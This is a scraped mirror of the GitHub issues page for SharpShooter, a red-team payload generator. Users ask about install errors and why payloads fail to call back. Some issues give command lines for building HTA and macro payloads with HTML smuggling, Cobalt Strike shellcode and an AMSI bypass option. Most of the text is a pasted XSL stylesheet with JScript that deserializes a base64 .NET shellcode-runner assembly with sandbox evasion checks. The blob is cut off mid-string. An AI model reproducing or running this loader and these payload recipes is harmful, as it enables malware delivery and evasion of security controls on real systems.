Giter Club home page Giter Club logo

sharpshooter's People

Contributors

byt3bl33d3r avatar dmchell avatar dumb-questions avatar mdsec avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

vysecurity minkione w00t3k hackinglz samyoyo sporiyano firefalc0n peterg75 m00zh33 jack2 jymcheong av1080p qsdj averroes aln7 k0rsec dmchell juan157 shantanu561993 0x09al pentest30 r3dfruitrollup johnhubcr tai-euler h0k5 tantantut clicknull ro9ueadmin myst404 tututu-patch cyberhack255 reconvillage1 analyticsearch ankushgoel27 expertasif 3453-315h mrtaheramine demonsec666 xcrypt999 tailoredaccessteam smgorelik orf53975 redwifiteam entropicecho samentlc d4mn4t10n therealsuser nckatiku samuelriesz eltorobiz ashr avgirl topotam diggold disk-kk hsis007 dannymas fuckup1337 bsaulsbury dcmjid tosgit 3x-m4ch1na nan3r h3llozy kyawthiha7 cryptedwolf jeperez gavz open-sec idkwim reydecopas rubyistctrldyt mindspoof johnjohnsp1 alex-dengx weeshlow mmg1 glira keystroke95 seabreg ch4p34un0ir subc0ol jack51706 sjtu2008 veteransec jayaramyalla r0cknrolla slooppe curtidwtw blasterxiao benedictmak notsurprised wgwjifeng reanimat0r rvrsh3ll projecthaidar rainism h1d3r dipsec haga5

sharpshooter's Issues

installing error

when i installed it it said ImportError: No module named jsmin

how can i fix this

Does not appear to work with reverse_http

Hi there,
In the blog posts its is shown that the reverse_http C# shell code is used. However after a couple hours of trying to use the tool for the first time thinking i was doing something wrong, I decided to switch to reverse_tcp and it worked the first try
Using the newest version of Kali and windows 7 SP1 .net 2-4 (Fireeye Flare packages installed)

Issue executing C# CobaltStrike Payload

Hi, I came across this yesterday and thought it was a really cool project so today I'm having a little play!
I have generated a C# payload from Cobalt Strike, and put it in the format "0x41, 0x42" etc, and then reference that in my command:

python SharpShooter.py --dotnetver 2 --stageless --payload hta --rawscfile ~/payload.cs --smuggle --output payload --template mcafee

I host the html and hta on the web server using "host file" in Cobalt strike. When I go and visit the page the HTA Downloads and I can execute it, but I don't get a callback.

Iv had a skim of the source code but its not immediately obvious to me why this wouldn't work. I have .NET installed on the machine im testing on also.

I suppose im asking does this definitely work with Cobalt Strike C# payloads?

Thanks again for the project and look forward to your response.
Cheers

EDIT 14:33:
I have been testing again and I put the same shellcode into the CS file and compiled and executed it worked fine. Its not an EDR product blocking either so I am still unsure. just doesnt seem to work when using the generated HTA file

Error installing

when i start SharpShooter after installing requirements.txt i do python SharpShooter.py but it doesn't start i also tried to do chmod + x or 777 on SharpShooter.py but it always gives me this error: Traceback (most latest call last):
File "SharpShooter.py", line 20, in
from jsmin import jsmin
ImportError: no module called jsmin

Is this project still under development?

I've done a recent git clone and it appears to not be accepting anything other than the staged HTA payload and even still it does not appear to connect back to the attacking machine. the demo one liners result in a looping error in its selection.

Am I missing something or is the tool just not ready to be used.

jsmin help

i successfully installed JSMIN, running python SharpShooter.py not locating jsmin and it exist on system. kindly advice

Correct Reg path for AMSI commit?

I was looking at your recent commit adding the AMSI bypass for VB and JS methods, and looked for the reg path HKCU\Software\Microsoft\Windows Script\Settings\ on my 1803 Windows machine, and couldn't find it. There is a HKCU\Software\Microsoft\Windows Script Host\Settings\ key however.

Just wanted to make sure that the path wasn't in error.

.Net v4 compatibility issue from VBA/macro

Hi,

I'm getting a similar problem to mdsecactivebreach/CACTUSTORCH#4. Basically I am generating a payload using the following arguments:

python SharpShooter.py --stageless --dotnetver 4 --payload macro --output foo --amsi amsienable --rawscfile payload.bin --com xslremote --awlurl http://172.16.132.1:80/foo.xsl

The macro is then being run on a Win 10 host with only .net framework v4 installed (no .net v2). However, with both my own assembly and the built-in sharpshooter assembly, the code executes but I get no callbacks. After putting in some debug shell.popups, it looks like it's failing when it gets to some of the System calls. Is there some sort of issue with running the JScript from XSL on systems with on .net v4 installed? The Jscript runs fine on the same system when executed from a SCT file etc.

Code below:

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:sharp="http://sharp.shooter/mynamespace">
 
<msxsl:script language="JScript" implements-prefix="sharp">
   function shooter(nodelist) {
<![CDATA[
function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
function debug(s) {}
function base64ToStream(b) {
	var enc = new ActiveXObject("System.Text.ASCIIEncoding");
	var length = enc.GetByteCount_2(b);
	var ba = enc.GetBytes_4(b);
	var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
	ba = transform.TransformFinalBlock(ba, 0, length);
	var ms = new ActiveXObject("System.IO.MemoryStream");
	ms.Write(ba, 0, (length / 4) * 3);
	ms.Position = 0;
	return ms;
}

var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAACoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAC2SEWgAAAAAA"+
"AAAA4AAiIAsBMAAAIAAAAAgAAAAAAACKPwAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAOD8A"+
"AE8AAAAAQAAAVAQAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAA+AAAcAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAACQHwAAACAAAAAgAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAVAQAAABA"+
"AAAABgAAACIAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAoAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAGw/AAAAAAAASAAAAAIABQDMIwAANBoAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXgMoEAAACm8R"+
"AAAKFygSAAAKLAIXKhYqbnIBAABwKBAAAApvEQAAChcoEgAACiwCFioXKhMwBABSAQAAAQAAEXMT"+
"AAAKCh8gjRoAAAElFnIDAABwoiUXclUAAHCiJRhypQAAcKIlGXLzAABwoiUackUBAHCiJRtylQEA"+
"cKIlHHLhAQBwoiUdcjkCAHCiJR5yjQIAcKIlHwly3QIAcKIlHwpyNwMAcKIlHwtyhwMAcKIlHwxy"+
"3wMAcKIlHw1yNwQAcKIlHw5ylwQAcKIlHw9y5wQAcKIlHxByPQUAcKIlHxFykwUAcKIlHxJy4wUA"+
"cKIlHxNyOQYAcKIlHxRyfQYAcKIlHxVywQYAcKIlHxZyBwcAcKIlHxdySQcAcKIlHxhymwcAcKIl"+
"Hxly6QcAcKIlHxpyOwgAcKIlHxtykwgAcKIlHxxy4wgAcKIlHx1yQQkAcKIlHx5yiwkAcKIlHx9y"+
"zwkAcKILFgwrFwcImg0JKBQAAAosBwYJbxUAAAoIF1gMCAeOaTLjBm8WAAAKLQIWKhcqAAATMAYA"+
"xwAAAAIAABFzEwAACgobjRoAAAElFnIZCgBwoiUXcicKAHCiJRhyNQoAcKIlGXJDCgBwoiUaclEK"+
"AHCiCygXAAAKDBYNK3YICZoTBAcTBRYTBitdEQURBpoTBxEEbxgAAApvGQAACm8aAAAKEQdvGgAA"+
"Cm8bAAAKLDEGEQRvGAAACm8ZAAAKcl8KAHByaQoAcCgcAAAKF40fAAABJRYfOp1vHQAACm8VAAAK"+
"EQYXWBMGEQYRBY5pMpsJF1gNCQiOaTKEBm8WAAAKLQIWKhcqLigeAAAKLAIXKhYqHgIoHwAACioA"+
"EzACAG0AAAADAAARcwYAAAYKA0UFAAAAAQAAABEAAAAgAAAALwAAAD4AAAAqBgRvAQAABi1CFygg"+
"AAAKKgZvAgAABi0zFyggAAAKKgZvAwAABiwkFyggAAAKKgZvBAAABiwVFyggAAAKKgZvBQAABiwG"+
"FyggAAAKKjJzCgAABgNvDQAABioAABswBABbAAAABAAAEQMoIQAACgp+IgAACgaOaRdYaigjAAAK"+
"IAAwAAAfQCgHAAAGCwYWBwaOaSgkAAAKB9AHAAACKCUAAAooJgAACnQHAAACbw8AAAYm3g4HFiAA"+
"gAAAKAkAAAYm3CoAARAAAAIAJAAoTAAOAAAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAA"+
"AAUAbAAAAPAFAAAjfgAAXAYAAOwGAAAjU3RyaW5ncwAAAABIDQAAdAoAACNVUwC8FwAAEAAAACNH"+
"VUlEAAAAzBcAAGgCAAAjQmxvYgAAAAAAAAACAAABVx0CHAkCAAAA+gEzABYAAAEAAAAoAAAABwAA"+
"ABcAAAARAAAAFwAAACYAAAAUAAAAEQAAAAQAAAACAAAAAQAAAAMAAAABAAAAAgAAAAQAAAAAAEEE"+
"AQAAAAAABgARA4cFBgB+A4cFBgAtAj0FDwCnBQAABgBVApQEBgDDApQEBgCkApQEBgBlA5QEBgAx"+
"A5QEBgBKA5QEBgBsApQEBgBBAmgFBgAfAmgFBgCHApQEBgBqBloEBgABAOYACgBiAXYEBgACA1oE"+
"BgBhBFoEBgC3BGgFBgDgAmgFBgANAloEBgCTBloEBgAPBFoECgC5BXYEBgAEBFoEBgDJBFoEBgDB"+
"AX8ACgAhBnYECgDLBv8FBgDiBFoEBgDnBD0FBgCnBloEBgDDBloEBgA2BVoEBgA1BVoEBgAsBGgF"+
"BgDsAVoEBgCdAVoEBgAWAloEAAAAAB0AAAAAAAEAAQAAABAA8QEAAD0AAQABAAEAEAAaBQAAPQAB"+
"AAcAAgEAAOIBAABNAAEADgACAQAApgQAAE0ACQAOAAIBAADXAQAATQAVAA4AAgEAAP0BAABZABgA"+
"DgAGBswALgFWgKoAMQFWgFkAMQFWgJ4AMQFWgIkAMQFWgG0AMQFWgHYAMQFWgGEAMQEGBswALgFW"+
"gFEANQFWgCYANQFWgD8ANQFWgLoANQFWgJUANQFWgLEANQFWgEcANQFWgMIANQFWgK8DNQFWgMID"+
"NQFWgNcDNQEGBswALgFWgKQAOQFWgDMAOQFQIAAAAACGAGYEcQABAGggAAAAAIYARAE9AQIAhCAA"+
"AAAAhgBKBj0BAgDkIQAAAACGAN0APQECALciAAAAAIYAKgE9AQIAwyIAAAAAhhgvBQYAAgAAAAAA"+
"gACRIAEBQQECAAAAAACAAJYgGQFLAQYAAAAAAIAAkSB7AVUBDADDIgAAAACGGC8FBgAPAMwiAAAA"+
"AIYA8QFdAQ8ARSMAAAAAhgDaBBAAEQBUIwAAAACGAL0GEAASAAAAAAADAIYYLwVjARMAAAAAAAMA"+
"xgGWAU4AFQAAAAAAAwDGAZEBaQEVAAAAAAADAMYBhwFxARcAAAABAG8EAAABADEGAAACAKgDAAAD"+
"AOABAAAEAHgGAAABAMwFAAACAJwDAAADADsGAAAEAPAEAAAFAN8FAAAGAA4BAAABADEGAAACAKgD"+
"AAADANUBAAABACYEAAACAAsEAAABABEAAAABABEAAAABAHEGAAACAFsBAAABAB0EAAACAHEGAAAB"+
"AKAGCQAvBQEAEQAvBQYAGQAvBQoAKQAvBRAAMQAvBRAAOQAvBRAAQQAvBRAASQAvBRAAUQAvBRAA"+
"WQAvBRAAYQAvBRUAaQAvBRAAcQAvBRAAkQAvBQYAqQAvBRoAyQC2BSAAyQDGASUA0QDvBSkADAAv"+
"BQYA4QBjBkMADAAmAUgADACzBk4AiQBQBWYAiQAeBmwAeQACBCUA0QAnBSUA0QD2BXEA8QBzAXYA"+
"0QBTAX0AAQE1AYMAeQAvBQYACQGOBowAEQHxA5cAGQHdBJ0AIQGCBqAAKQHmBqUAMQGvAa4AKQH8"+
"BLcACQAIAMoACQAMAM8ACQAQANQACQAUANkACQAYAN4ACQAcAOMACQAgAOgACQAoAO0ACQAsAPIA"+
"CQAwAPcACQA0APwACQA4AAEBCQA8AAYBCQBAAAsBCQBEABABCQBIABUBCQBMABoBCQBQAB8BCQBY"+
"ACQBCQBcACkBLgALAHcBLgATAIABLgAbAJ8BLgAjAKgBLgArAMIBLgAzAOUBLgA7AOsBLgBDAKgB"+
"LgBLAAMCLgBTAOUBLgBbAOUBLgBjACsCLgBrAFUCYwBbAGICgwBzAAEBowBzAAEB4wB7AJ8BMQBS"+
"AIcAkQA0BAgAPQBAAQ8AAQEBAAABEQAZAQEAAAETAHsBAgAEgAAAAQAAAAAAAAAAAAAAAADRBgAA"+
"AgAAAAAAAAAAAAAAwQDUAAAAAAACAAAAAAAAAAAAAADBAFoEAAAAAAQAAwAFAAMABgADAAcAAwAA"+
"AAAAAExpc3RgMQBrZXJuZWwzMgBzaGVsbGNvZGU2NAA8TW9kdWxlPgBFWEVDVVRFX1JFQUQATUVN"+
"X1JFTEVBU0UARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAFdSSVRFX1dBVENIAFBI"+
"WVNJQ0FMAFRPUF9ET1dOAFN5c3RlbS5JTwBMQVJHRV9QQUdFUwBOT0FDQ0VTUwBSRVNFVABNRU1f"+
"REVDT01NSVQAUkVBRE9OTFkARVhFQ1VURV9XUklURUNPUFkAdmFsdWVfXwBtc2NvcmxpYgBpc0Jh"+
"ZE1hYwBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBWaXJ0dWFsQWxsb2MAbHBUaHJlYWRJZABD"+
"cmVhdGVUaHJlYWQAQWRkAGlzRGVidWdnZWQAZ2V0X0lzQXR0YWNoZWQAaXNEb21haW5Kb2luZWQA"+
"VHJpbUVuZABtZXRob2QATmV0d29ya0ludGVyZmFjZQBSZXBsYWNlAFZpcnR1YWxGcmVlAEVuZElu"+
"dm9rZQBCZWdpbkludm9rZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBGaWxl"+
"AGdldF9Eb21haW5OYW1lAGR3RnJlZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBDaGVja1BsZWFzZQBF"+
"eGVjdXRlRGVsZWdhdGUATXVsdGljYXN0RGVsZWdhdGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxl"+
"QXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3Nl"+
"bWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2Vt"+
"Ymx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAFVu"+
"bWFuYWdlZEZ1bmN0aW9uUG9pbnRlckF0dHJpYnV0ZQBGbGFnc0F0dHJpYnV0ZQBDb21waWxhdGlv"+
"blJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNv"+
"cHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGli"+
"aWxpdHlBdHRyaWJ1dGUAZHdTdGFja1NpemUAZHdTaXplAEdVQVJEX01vZGlmaWVyZmxhZwBOT0NB"+
"Q0hFX01vZGlmaWVyZmxhZwBXUklURUNPTUJJTkVfTW9kaWZpZXJmbGFnAEZyb21CYXNlNjRTdHJp"+
"bmcAVG9TdHJpbmcAYXJnAEFzeW5jQ2FsbGJhY2sAY2FsbGJhY2sAY2hlY2sATWFyc2hhbABrZXJu"+
"ZWwzMi5kbGwAU2hhcnBTaG9vdGVyQXNzZW1ibHkuZGxsAFN5c3RlbQBFbnVtAGlzRG9tYWluAGRv"+
"bWFpbgBTeXN0ZW0uTmV0Lk5ldHdvcmtJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNZW1v"+
"cnlQcm90ZWN0aW9uAENhbGxpbmdDb252ZW50aW9uAFN0cmluZ0NvbXBhcmlzb24AR28AWmVybwBD"+
"aGFyAERlYnVnZ2VyAGxwUGFyYW1ldGVyAEdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyAFNo"+
"YXJwU2hvb3RlcgBUb0xvd2VyAC5jdG9yAFVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAEdldEFs"+
"bE5ldHdvcmtJbnRlcmZhY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0u"+
"UnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEdldElQR2xvYmFsUHJvcGVy"+
"dGllcwBscFRocmVhZEF0dHJpYnV0ZXMAZHdDcmVhdGlvbkZsYWdzAEVxdWFscwBDb250YWlucwBT"+
"eXN0ZW0uVGV4dC5SZWd1bGFyRXhwcmVzc2lvbnMAR2V0UGh5c2ljYWxBZGRyZXNzAGxwQWRkcmVz"+
"cwBscFN0YXJ0QWRkcmVzcwBjb250YWluc1NhbmRib3hBcnRpZmFjdHMARXhpc3RzAE9iamVjdABv"+
"YmplY3QAZmxQcm90ZWN0AG9wX0V4cGxpY2l0AEV4aXQASUFzeW5jUmVzdWx0AHJlc3VsdABFbnZp"+
"cm9ubWVudABnZXRfQ291bnQAU2hvb3QAQ29udmVydABSZWdleABTaGFycFNob290ZXJBc3NlbWJs"+
"eQBDb3B5AAAAAQBRQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARABy"+
"AGkAdgBlAHIAcwBcAFYAbQBtAG8AdQBzAGUALgBzAHkAcwAAT0MAOgBcAHcAaQBuAGQAbwB3AHMA"+
"XABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AMwBkAGcAbAAuAGQAbABs"+
"AABNQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIA"+
"cwBcAHYAbQBkAHUAbQAuAGQAbABsAABRQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0"+
"AGkAdgBlAFwARAByAGkAdgBlAHIAcwBcAHYAbQAzAGQAdgBlAHIALgBkAGwAbAAAT0MAOgBcAHcA"+
"aQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AdABy"+
"AGEAeQAuAGQAbABsAABLQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwA"+
"RAByAGkAdgBlAHIAcwBcAHYAbQBjAGkALgBzAHkAcwAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AdQBzAGIAbQBvAHUAcwBlAC4A"+
"cwB5AHMAAFNDADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2"+
"AGUAcgBzAFwAdgBtAHgAXwBzAHYAZwBhAC4AcwB5AHMAAE9DADoAXAB3AGkAbgBkAG8AdwBzAFwA"+
"UwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUAcgBzAFwAdgBtAHgAbgBlAHQALgBzAHkAcwAA"+
"WUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMA"+
"XABWAE0AVABvAG8AbABzAEgAbwBvAGsALgBkAGwAbAAAT0MAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AaABnAGYAcwAuAGQAbABsAABX"+
"QwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIAcwBc"+
"AHYAbQBtAG8AdQBzAGUAdgBlAHIALgBkAGwAbAAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkA"+
"cwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0ARwB1AGUAcwB0AEwAaQBiAC4AZABs"+
"AGwAAF9DADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUA"+
"cgBzAFwAVgBtAEcAdQBlAHMAdABMAGkAYgBKAGEAdgBhAC4AZABsAGwAAE9DADoAXAB3AGkAbgBk"+
"AG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUAcgBzAFwAdgBtAHMAYwBzAGkA"+
"LgBzAHkAcwAAVUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBp"+
"AHYAZQByAHMAXABWAEIAbwB4AE0AbwB1AHMAZQAuAHMAeQBzAABVQwA6AFwAdwBpAG4AZABvAHcA"+
"cwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIAcwBcAFYAQgBvAHgARwB1AGUAcwB0"+
"AC4AcwB5AHMAAE9DADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIA"+
"aQB2AGUAcgBzAFwAVgBCAG8AeABTAEYALgBzAHkAcwAAVUMAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXABWAEIAbwB4AFYAaQBkAGUAbwAuAHMA"+
"eQBzAABDQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAdgBiAG8AeABk"+
"AGkAcwBwAC4AZABsAGwAAENDADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUA"+
"XAB2AGIAbwB4AGgAbwBvAGsALgBkAGwAbAAARUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBu"+
"AGEAdABpAHYAZQBcAHYAYgBvAHgAbQByAHgAbgBwAC4AZABsAGwAAEFDADoAXAB3AGkAbgBkAG8A"+
"dwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAC4AZABsAGwAAFFDADoAXAB3"+
"AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAGEAcgByAGEA"+
"eQBzAHAAdQAuAGQAbABsAABNQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBl"+
"AFwAdgBiAG8AeABvAGcAbABjAHIAdQB0AGkAbAAuAGQAbABsAABRQwA6AFwAdwBpAG4AZABvAHcA"+
"cwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAdgBiAG8AeABvAGcAbABlAHIAcgBvAHIAcwBwAHUALgBk"+
"AGwAbAAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgA"+
"bwBnAGwAZgBlAGUAZABiAGEAYwBrAHMAcAB1AC4AZABsAGwAAE9DADoAXAB3AGkAbgBkAG8AdwBz"+
"AFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAHAAYQBjAGsAcwBwAHUALgBkAGwA"+
"bAAAXUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgAbwBn"+
"AGwAcABhAHMAcwB0AGgAcgBvAHUAZwBoAHMAcAB1AC4AZABsAGwAAElDADoAXAB3AGkAbgBkAG8A"+
"dwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AHMAZQByAHYAaQBjAGUALgBlAHgAZQAA"+
"Q0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgAdAByAGEA"+
"eQAuAGUAeABlAABJQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAVgBC"+
"AG8AeABDAG8AbgB0AHIAbwBsAC4AZQB4AGUAAA0wADAAMABDADIAOQAADTAAMAAxAEMAMQA0AAAN"+
"MAAwADUAMAA1ADYAAA0wADAAMAA1ADYAOQAADTAAOAAwADAAMgA3AAAJLgB7ADIAfQAAByQAMAA6"+
"AAAAAADjPT+Kbg2uQYSXn8N3asUDAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIFIAEBEVEEAAAS"+
"ZQMgAA4HAAMCDg4RbQsHBBUSQQEOHQ4IDgUVEkEBDgQAAQIOBSABARMAAyAACBMHCBUSQQEOHQ4d"+
"EkUIEkUdDggOBQAAHRJFBCAAEnUEIAECDgYAAw4ODg4FIAEOHQMDAAACBAcBEggEAAEBCAUHAh0F"+
